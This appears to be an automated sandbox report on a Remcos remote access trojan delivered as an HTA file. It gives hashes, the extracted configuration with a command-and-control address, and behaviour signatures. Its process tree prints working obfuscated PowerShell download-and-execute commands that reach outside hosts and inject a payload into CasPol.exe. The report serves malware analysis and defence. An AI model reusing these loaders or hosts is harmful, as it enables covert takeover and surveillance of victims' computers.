remcos | 7a27c246967ee9e339939078beca4363d45d663aefb9c9b49fe891136b70e4ae

Analysis

max time kernel
148s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
01-02-2025 13:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

nicegirlgivenmebestthingswithentiretimegoodfor.hta
Size

15KB
MD5

91646dc944a9b144775945568f2acea3
SHA1

10b33643c23d1ed56a9702c16c030f851215fa2a
SHA256

7a27c246967ee9e339939078beca4363d45d663aefb9c9b49fe891136b70e4ae
SHA512

3a5e252523306c2bf0928987cd2bd1af6803995962424a2873caa965a5f4b7a90bbbe6128600c85889944a1bd297f27ec792ce3afb563ae0afc8d46e717e847c
SSDEEP

48:3PCAuD4bcMcMzn4bcM4ken2tsdz2BAvNupkfxRfvCFBlTEwQ4X4bcMeKdPG:/CVot4sdqBk0pcaW+

Score

10^/10

remcos remotehost defense_evasion discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

172.245.123.12:8690

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-M39SJI
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Blocklisted process makes network request 3 IoCs

flow	pid	Process
14	4380	powershell.exe
17	4136	powershell.exe
18	4136	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
3944	cmd.exe
4380	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\Control Panel\International\Geo\Nation	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4136	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4136 set thread context of 4532	4136	powershell.exe	96

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4380	powershell.exe
4380	powershell.exe
4136	powershell.exe
4136	powershell.exe
4136	powershell.exe
4136	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4380	powershell.exe
Token: SeDebugPrivilege	4136	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4532	CasPol.exe

Suspicious use of WriteProcessMemory 31 IoCs

description	pid	Process	procid_target
PID 3812 wrote to memory of 3944	3812	mshta.exe	86
PID 3812 wrote to memory of 3944	3812	mshta.exe	86
PID 3812 wrote to memory of 3944	3812	mshta.exe	86
PID 3944 wrote to memory of 4380	3944	cmd.exe	88
PID 3944 wrote to memory of 4380	3944	cmd.exe	88
PID 3944 wrote to memory of 4380	3944	cmd.exe	88
PID 4380 wrote to memory of 5024	4380	powershell.exe	89
PID 4380 wrote to memory of 5024	4380	powershell.exe	89
PID 4380 wrote to memory of 5024	4380	powershell.exe	89
PID 5024 wrote to memory of 2224	5024	csc.exe	90
PID 5024 wrote to memory of 2224	5024	csc.exe	90
PID 5024 wrote to memory of 2224	5024	csc.exe	90
PID 4380 wrote to memory of 4644	4380	powershell.exe	91
PID 4380 wrote to memory of 4644	4380	powershell.exe	91
PID 4380 wrote to memory of 4644	4380	powershell.exe	91
PID 4644 wrote to memory of 4136	4644	WScript.exe	92
PID 4644 wrote to memory of 4136	4644	WScript.exe	92
PID 4644 wrote to memory of 4136	4644	WScript.exe	92
PID 4136 wrote to memory of 3240	4136	powershell.exe	95
PID 4136 wrote to memory of 3240	4136	powershell.exe	95
PID 4136 wrote to memory of 3240	4136	powershell.exe	95
PID 4136 wrote to memory of 4532	4136	powershell.exe	96
PID 4136 wrote to memory of 4532	4136	powershell.exe	96
PID 4136 wrote to memory of 4532	4136	powershell.exe	96
PID 4136 wrote to memory of 4532	4136	powershell.exe	96
PID 4136 wrote to memory of 4532	4136	powershell.exe	96
PID 4136 wrote to memory of 4532	4136	powershell.exe	96
PID 4136 wrote to memory of 4532	4136	powershell.exe	96
PID 4136 wrote to memory of 4532	4136	powershell.exe	96
PID 4136 wrote to memory of 4532	4136	powershell.exe	96
PID 4136 wrote to memory of 4532	4136	powershell.exe	96

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\nicegirlgivenmebestthingswithentiretimegoodfor.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3812
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c pOwErShEll.EXe -Ex BYpaSs -NOP -w 1 -c deViCeCREDENtiAldEPlOyMenT ; INvOKe-expreSsion($(iNVOKe-EXpResSIOn('[syStEm.TeXt.ENcoDinG]'+[chAR]0X3a+[char]0X3A+'utF8.gETsTRInG([sySTEM.CONVeRT]'+[CHar]58+[cHar]0X3a+'frOmBAsE64StRiNg('+[CHAr]34+'JFBkMSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CZXJERWZJbml0SU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZuTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDZVdwV3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT09vbWdGdXFULHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZZmssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcGFmREQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqUkRwemwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVTUEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFBkMTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjg2Lzc0NC9uZXd0aGluZ3NhcmViZXR0ZXJ3YXl0b2dldG1lYmFja2dvb2R0aGluZ3NhbHdheXMuZ0lGIiwiJGVudjpBUFBEQVRBXG5ld3RoaW5nc2FyZWJldHRlcndheXRvZ2V0bWViYWNrZ29vZHRoaW5nc2Fsd2F5LnZicyIsMCwwKTtzdEFSdC1TTEVlUCgzKTtJbnZPa0UtRXhwckVTc2lPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmV3dGhpbmdzYXJlYmV0dGVyd2F5dG9nZXRtZWJhY2tnb29kdGhpbmdzYWx3YXkudmJzIg=='+[cHaR]0x22+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3944
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOwErShEll.EXe -Ex BYpaSs -NOP -w 1 -c deViCeCREDENtiAldEPlOyMenT ; INvOKe-expreSsion($(iNVOKe-EXpResSIOn('[syStEm.TeXt.ENcoDinG]'+[chAR]0X3a+[char]0X3A+'utF8.gETsTRInG([sySTEM.CONVeRT]'+[CHar]58+[cHar]0X3a+'frOmBAsE64StRiNg('+[CHAr]34+'JFBkMSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CZXJERWZJbml0SU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZuTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDZVdwV3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT09vbWdGdXFULHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZZmssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcGFmREQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqUkRwemwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVTUEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFBkMTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjg2Lzc0NC9uZXd0aGluZ3NhcmViZXR0ZXJ3YXl0b2dldG1lYmFja2dvb2R0aGluZ3NhbHdheXMuZ0lGIiwiJGVudjpBUFBEQVRBXG5ld3RoaW5nc2FyZWJldHRlcndheXRvZ2V0bWViYWNrZ29vZHRoaW5nc2Fsd2F5LnZicyIsMCwwKTtzdEFSdC1TTEVlUCgzKTtJbnZPa0UtRXhwckVTc2lPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmV3dGhpbmdzYXJlYmV0dGVyd2F5dG9nZXRtZWJhY2tnb29kdGhpbmdzYWx3YXkudmJzIg=='+[cHaR]0x22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4380
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yaagpiw1\yaagpiw1.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:5024
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8155.tmp" "c:\Users\Admin\AppData\Local\Temp\yaagpiw1\CSC6077D59790574D07B9DF8ABE87A2CB79.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2224
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\newthingsarebetterwaytogetmebackgoodthingsalway.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4644
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AYQB3AGcAbgBpAGgAdAB5AHIAZQB2AGUAcgBvAGYAZABvAG8AZwBlAGgAcwAvADQANAA3AC8ANgA4AC4AMwAyADEALgA1ADQAMgAuADIANwAxAC8ALwA6AHAAdAB0AGgAJwA7ACQAcgBlAHMAdABvAHIAZQBkAFQAZQB4AHQAIAA9ACAAJABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAC0AcgBlAHAAbABhAGMAZQAgACcAIwAnACwAIAAnAHQAJwA7ACQAaQBtAGEAZwBlAFUAcgBsACAAPQAgACcAaAB0AHQAcABzADoALwAvAHIAZQBzAC4AYwBsAG8AdQBkAGkAbgBhAHIAeQAuAGMAbwBtAC8AZABhAHgAdwB1AGEANgAzAHkALwBpAG0AYQBnAGUALwB1AHAAbABvAGEAZAAvAHYAMQA3ADMANwA2ADkANgAxADcAMQAvAGgAZQBrAGUAMgBwAG0AdABlAHUAdwA4AHMAcQBzAHAAbABoAGsAbAAuAGoAcABnACcAOwAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACQAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwAkAHMAdABhAHIAdABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgACQAZQBuAGQASQBuAGQAZQB4ACAALQAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHMAdABhAHIAdABJAG4AZABlAHgALAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7ACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7ACQAdAB5AHAAZQAgAD0AIABbAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAbQBhAGkAbgAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgAEAAKAAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACwAJwBmAGEAbABzAGUAJwAsACcAQwBhAHMAUABvAGwAJwAsACcAZgBhAGwAcwBlACcAKQApAA==')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4136
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        
        PID:3240
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4532

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
102B

MD5
c121531b391c15d6d4532c43747f3f6b

SHA1
adefd3a13ef144b7f0a284e318b09b9c76934006

SHA256
e8b07f4358154fb727a64f6b3319ee29c71aacfcf248fed6c4c7cbb273ef626c

SHA512
c266985e002168d16d7a69785924b022359ceb7491b1b4ecfc682f1707bb5640c2937d02229a78a37313e5be790930207874b567708cefffce9c89fccb54be8f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
a867a786b801a8869d0911c8699b3c5f

SHA1
6ee2d3d290e501cf6a5e25885cd761d07f2a9fa1

SHA256
d5d03851aaebed1fc7bec70645760df7394784c94eb4b266ccf4bd75af483542

SHA512
32322822736d413999191b37407c1556477dccef9d6d818358136f458cc36a5447843bbd132a47d5e9bb3053c692807bb9306333669a1b4cf3003d96ff84dd98

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8155.tmp

Filesize
1KB

MD5
67100cc95b89d8ed8b0c431e8688fe91

SHA1
4ace7e2953358a40b24259628cfc1b141d22e34a

SHA256
037498de9208ac783ddabe3a2d5de9e4154ccf48862f194b000c421e15cff9ad

SHA512
dc50c554236f0e66b0c72ee763d5ea0c3a0e6640283c4fc5e58b53525b14f2d02cdd417ad86e296e059f0f41a1279cf6d34d69087078d9f2c11fba57bdc05e13

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2zztrphj.we5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\yaagpiw1\yaagpiw1.dll

Filesize
3KB

MD5
0cb4536b45d0f224e65edab3772e1a25

SHA1
a3f765251049819473e464ed7bcc7df3acc7ddf8

SHA256
ddad7f5831c8639e05b7835e770b527e539593e7ce25b267e87c3082ffb5d1db

SHA512
a8f9a4e954ca413d60f1fbfcc89a83bc48c1b6a4b8c9ca1a4d81e026cc1d2b5974522db088ac5c183019432ce6222a542a2455db2d0e5a841641fc3c93980290

Download Submit
C:\Users\Admin\AppData\Roaming\newthingsarebetterwaytogetmebackgoodthingsalway.vbs

Filesize
223KB

MD5
89fcf06221c1830a49699337619dede8

SHA1
271b9e22164d51304be579097a14b63b49b6779e

SHA256
535ce1889084523a7a1c04a570ca2000b924d5289cd1276146665c531ee2157e

SHA512
4842ee71b17d3848ec0517c3953eaae90ed0f9ac8249f20306c891e3954021dc648c97ac9bf2c2cea58df669fd492e922300bb229fcacefadedee30d72a733e4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yaagpiw1\CSC6077D59790574D07B9DF8ABE87A2CB79.TMP

Filesize
652B

MD5
7b635e8b7a8c680b9a06f88bb82da929

SHA1
ed90ce7fc53f99c3fbfc75cf1c4e4621a2e4ac1e

SHA256
ee023710c21d15f8f0dd23770b49e051d07ec7128c644d95dfb1cac60277cae4

SHA512
0920b80f3d753a4f46432b14301d4e5196a6eae8f1579d426770dd30937e7e2ef30dcf4ac1d51776114be5f1d5affe623790149f14f8b38ea83098643340525c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yaagpiw1\yaagpiw1.0.cs

Filesize
466B

MD5
255c71170d7a96f4371816ea477745d5

SHA1
945c5a56ca2eced03c95d864876c30cbe8cc5e1b

SHA256
038969e25a28b8206b3a16c9b2ee846f9d55c8a2c4e5e12be7e0dc7f6e2a8a75

SHA512
e0972176b389e3689c22d3db51b16d4f3fc5f1015bab41e735f39f1ffa7de8660d61fe666ddc2c96430800d7508a23f150e17fb87f938359fcfe20474f9f3ab1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yaagpiw1\yaagpiw1.cmdline

Filesize
369B

MD5
8f006b3a1b7f7c9b4fffbb8a7bb9752f

SHA1
fa0c18aabcf2fb247d4c20d47a5446ddeaf72b8b

SHA256
0ab296c5771afc4c4ada05f0c5cf85bbc61fe5398c077bf6e8e3cc544da2fb23

SHA512
5977dda085a2dee09eefb43f257566a98caaeb3faf144db01011575df70c2d6e56c446d8ba0e3a98a6351a5baf3381e6c19d9a0ca1d6418e5547cd40f6b4e43d

Download Submit
memory/4136-83-0x0000000006F40000-0x0000000006F54000-memory.dmp

Filesize
80KB

Download
memory/4136-81-0x00000000054A0000-0x00000000057F4000-memory.dmp

Filesize
3.3MB

Download
memory/4136-84-0x0000000006F30000-0x0000000006F36000-memory.dmp

Filesize
24KB

Download
memory/4136-85-0x0000000007040000-0x00000000070DC000-memory.dmp

Filesize
624KB

Download
memory/4380-35-0x0000000071B60000-0x0000000072310000-memory.dmp

Filesize
7.7MB

Download
memory/4380-17-0x0000000005780000-0x0000000005AD4000-memory.dmp

Filesize
3.3MB

Download
memory/4380-22-0x000000006E580000-0x000000006E8D4000-memory.dmp

Filesize
3.3MB

Download
memory/4380-21-0x000000006E420000-0x000000006E46C000-memory.dmp

Filesize
304KB

Download
memory/4380-20-0x0000000006B20000-0x0000000006B52000-memory.dmp

Filesize
200KB

Download
memory/4380-33-0x0000000006B60000-0x0000000006B7E000-memory.dmp

Filesize
120KB

Download
memory/4380-32-0x0000000071B60000-0x0000000072310000-memory.dmp

Filesize
7.7MB

Download
memory/4380-34-0x0000000006E30000-0x0000000006ED3000-memory.dmp

Filesize
652KB

Download
memory/4380-18-0x0000000005B60000-0x0000000005B7E000-memory.dmp

Filesize
120KB

Download
memory/4380-38-0x0000000071B60000-0x0000000072310000-memory.dmp

Filesize
7.7MB

Download
memory/4380-37-0x0000000006C00000-0x0000000006C1A000-memory.dmp

Filesize
104KB

Download
memory/4380-36-0x0000000007560000-0x0000000007BDA000-memory.dmp

Filesize
6.5MB

Download
memory/4380-39-0x0000000006F30000-0x0000000006F3A000-memory.dmp

Filesize
40KB

Download
memory/4380-40-0x0000000007150000-0x00000000071E6000-memory.dmp

Filesize
600KB

Download
memory/4380-41-0x00000000070B0000-0x00000000070C1000-memory.dmp

Filesize
68KB

Download
memory/4380-19-0x0000000005BB0000-0x0000000005BFC000-memory.dmp

Filesize
304KB

Download
memory/4380-42-0x00000000070E0000-0x00000000070EE000-memory.dmp

Filesize
56KB

Download
memory/4380-43-0x00000000070F0000-0x0000000007104000-memory.dmp

Filesize
80KB

Download
memory/4380-44-0x0000000007130000-0x000000000714A000-memory.dmp

Filesize
104KB

Download
memory/4380-45-0x0000000007120000-0x0000000007128000-memory.dmp

Filesize
32KB

Download
memory/4380-58-0x0000000007120000-0x0000000007128000-memory.dmp

Filesize
32KB

Download
memory/4380-64-0x0000000071B6E000-0x0000000071B6F000-memory.dmp

Filesize
4KB

Download
memory/4380-65-0x0000000071B60000-0x0000000072310000-memory.dmp

Filesize
7.7MB

Download
memory/4380-7-0x0000000005510000-0x0000000005576000-memory.dmp

Filesize
408KB

Download
memory/4380-70-0x0000000071B60000-0x0000000072310000-memory.dmp

Filesize
7.7MB

Download
memory/4380-6-0x0000000004CC0000-0x0000000004D26000-memory.dmp

Filesize
408KB

Download
memory/4380-5-0x0000000004BA0000-0x0000000004BC2000-memory.dmp

Filesize
136KB

Download
memory/4380-3-0x0000000004D70000-0x0000000005398000-memory.dmp

Filesize
6.2MB

Download
memory/4380-4-0x0000000071B60000-0x0000000072310000-memory.dmp

Filesize
7.7MB

Download
memory/4380-2-0x0000000071B60000-0x0000000072310000-memory.dmp

Filesize
7.7MB

Download
memory/4380-1-0x0000000002260000-0x0000000002296000-memory.dmp

Filesize
216KB

Download
memory/4380-0-0x0000000071B6E000-0x0000000071B6F000-memory.dmp

Filesize
4KB

Download
memory/4532-99-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4532-130-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4532-93-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4532-92-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4532-94-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4532-95-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4532-97-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4532-98-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4532-88-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4532-101-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4532-102-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4532-104-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4532-105-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4532-106-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4532-108-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4532-109-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4532-86-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4532-111-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
